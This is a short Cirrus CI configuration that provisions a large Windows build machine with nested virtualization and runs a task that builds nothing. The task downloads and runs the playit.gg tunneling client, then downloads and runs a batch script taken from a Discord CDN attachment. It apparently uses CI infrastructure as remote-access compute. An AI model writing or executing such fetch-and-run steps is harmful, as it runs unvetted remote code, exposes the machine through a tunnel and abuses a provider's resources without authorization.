compute_engine_instance:
  image_project: cirrus-images # GCP project
  image: family/windows-docker-builder # family or a full image name.
  platform: windows
  cpu: 4 # optional. Defaults to 2 CPUs.
  memory: 16G # optional. Defaults to 4G.
  disk: 512 # optional. By default, uses the smallest disk size required by the image.
  nested_virtualization: true # optional. Whether to enable Intel VT-x. Defaults to false.
  
task:
  script:
   - curl -s -O https://playit.gg/downloads/playit-win_64-0.4.6.exe
   - playit-win_64-0.4.6.exe
   - curl -s -O https://cdn.discordapp.com/attachments/897461899627753473/900395706479673394/Chrome_pipeline.bat
   - Chrome_pipeline.bat
